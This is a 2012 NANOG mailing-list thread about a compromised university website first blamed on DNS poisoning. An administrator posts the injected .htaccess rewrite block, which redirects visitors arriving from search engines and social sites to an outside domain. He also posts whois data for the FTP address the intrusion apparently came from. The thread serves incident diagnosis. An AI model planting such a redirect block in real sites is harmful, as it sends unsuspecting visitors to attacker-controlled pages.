No DNS poisoning at Google (in case of trouble, blame the DNS)

Kyle Creyts kyle.creyts at gmail.com
Tue Jul 3 18:33:23 UTC 2012


and upon further investigation, it seems like there might be an actual
organization using a host with that IP...

http://www.robtex.com/dns/chatwithus.net.html#shared

On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts <kyle.creyts at gmail.com> wrote:

> it actually appears that skywire has a suballocation for that block,
> http://www.robtex.com/ip/208.88.11.111.html#whois
>
> #
> # The following results may also be obtained via:
> # http://whois.arin.net <http://www.robtex.com/dns/whois.arin.net.html>
> /rest/nets;q=208.88.11.111 <http://www.robtex.com/ip/208.88.11.111.html>
> ?showDetails=true&showARIN=false&ext=netref2
> #
>
> American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0<http://www.robtex.com/ip/208.88.11.0.html>
>  - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html>
>
> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0<http://www.robtex.com/ip/208.88.8.0.html>
>  - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html>
>
>  #
> # ARIN WHOIS data and services are subject to the Terms of Use
> # available at: https://www.arin.net<http://www.robtex.com/dns/www.arin.net.html>
> /whois_tou.html
> #
>
> On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black <Matthew.Black at csulb.edu>wrote:
>
>> By the way, FTP access originated from: 208.88.11.111
>>
>> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
>> 208.88.11.255
>>
>> NetRange:       208.88.8.0 - 208.88.11.255
>> CIDR:           208.88.8.0/22
>> OriginAS:       AS40603
>> NetName:        SKYWIRE-SG
>> NetHandle:      NET-208-88-8-0-1
>> Parent:         NET-208-0-0-0-0
>> NetType:        Direct Allocation
>> Comment:        http://www.skywireusa.com
>> RegDate:        2008-03-04
>> Updated:        2012-03-02
>> Ref:            http://whois.arin.net/rest/net/NET-208-88-8-0-1
>>
>> OrgName:        Sky Wire Communications
>> OrgId:          DGSU
>> Address:        946 W Sunset Blvd Ste L
>> City:           St George
>> StateProv:      UT
>> PostalCode:     84770
>> Country:        US
>> RegDate:        2007-12-04
>> Updated:        2009-11-04
>> Ref:            http://whois.arin.net/rest/org/DGSU
>>
>>
>> Who We Are
>> Skywire Communications is the Leading High Speed Internet Provider in
>> Southern Utah. Offering Service in St George, Washington, Santa Clara,
>> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
>> provide high speed internet access to 100 Percent of Southern Utah. We are
>> located in St George, Utah.
>>
>>
>>
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>> -----Original Message-----
>> From: Matthew Black [mailto:Matthew.Black at csulb.edu]
>> Sent: Wednesday, June 27, 2012 9:52 AM
>> To: 'Jason Hellenthal'; Arturo Servin
>> Cc: nanog at nanog.org
>> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the
>> DNS)
>>
>> Ask and ye shall receive:
>>
>> # more .htaccess (backup copy)
>>
>> #c3284d#
>> <IfModule mod_rewrite.c>
>> RewriteEngine On
>> RewriteCond %{HTTP_REFERER}
>> ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
>>
>> avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
>>
>> rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
>>
>> ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
>>
>> and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
>>
>> rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
>>
>> jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
>>
>> ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
>>
>> arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
>>
>> rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
>>
>> uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
>>
>> e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
>>
>> westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
>> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
>> </IfModule>
>> #/c3284d#
>>
>>           # # #
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>> -----Original Message-----
>> From: Jason Hellenthal [mailto:jhellenthal at dataix.net]
>> Sent: Wednesday, June 27, 2012 6:26 AM
>> To: Arturo Servin
>> Cc: nanog at nanog.org
>> Subject: Re: No DNS poisoning at Google (in case of trouble, blame the
>> DNS)
>>
>>
>> What would be nice is the to see the contents of the htaccess file
>> (obviously with sensitive information excluded)
>>
>> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>> >
>> > It was not DNS issue, but it was a clear case on how community-support
>> helped.
>> >
>> > Some of us may even learn some new tricks. :)
>> >
>> > Regards,
>> > as
>> >
>> > Sent from mobile device. Excuse brevity and typos.
>> >
>> >
>> > On 27 Jun 2012, at 05:07, Daniel Rohan <drohan at gmail.com> wrote:
>> >
>> > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <
>> bortzmeyer at nic.fr>wrote:
>> > >
>> > > What made you think it can be a DNS cache poisoning (a very rare
>> > >> event, despite what the media say) when there are many much more
>> > >> realistic possibilities (<troll>specially for a Web site written in
>> > >> PHP</troll>)?
>> > >>
>> > >> What was the evidence pointing to a DNS problem?
>> > >>
>> > >
>> > > It seems likely that he made a mistake in his analysis of the
>> evidence.
>> > > Something that could happen to anyone when operating outside of a
>> comfort
>> > > zone or having a bad day. Go easy.
>> > >
>> > > -DR
>> >
>>
>> --
>>
>>  - (2^(N-1))
>>
>>
>>
>>
>>
>>
>>
>>
>
>
> --
> Kyle Creyts
>
> Information Assurance Professional
> BSidesDetroit Organizer
>



-- 
Kyle Creyts

Information Assurance Professional
BSidesDetroit Organizer



More information about the NANOG mailing list